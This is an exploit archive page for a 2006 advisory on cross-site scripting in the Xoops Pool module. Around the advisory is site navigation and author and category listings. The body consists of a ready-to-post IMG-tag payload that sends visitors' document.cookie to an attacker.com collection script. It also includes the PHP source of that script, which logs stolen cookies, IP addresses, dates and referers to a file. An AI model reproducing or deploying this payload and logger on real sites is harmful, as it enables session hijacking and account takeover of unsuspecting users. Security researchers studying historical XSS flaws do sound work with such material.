xoopsXSS.txt

xoopsXSS.txt: Posted Jan 10, 2006; Authored by Night_Warrior; The Xoops Pool module is susceptible to cross site scripting via IMG tags.; tags | exploit, xss; SHA-256 | e2596114159f2fdb970e93755a1c7814648bccc25d110be890da0b1db67ab3ba; Download | Favorite | View

xoopsXSS.txt

##Night_Warrior<Kurdihs Hacker>
##night_warrior771[at]hotmail.com
##Xoops Pool Module IMG Tag Cross Site Scripting
##Contact :night_warrior771[at]hotmail.com
Post Coment this Code:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"

cookies.php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

xoopsXSS.txt

xoopsXSS.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xoopsXSS.txt

Share This

xoopsXSS.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems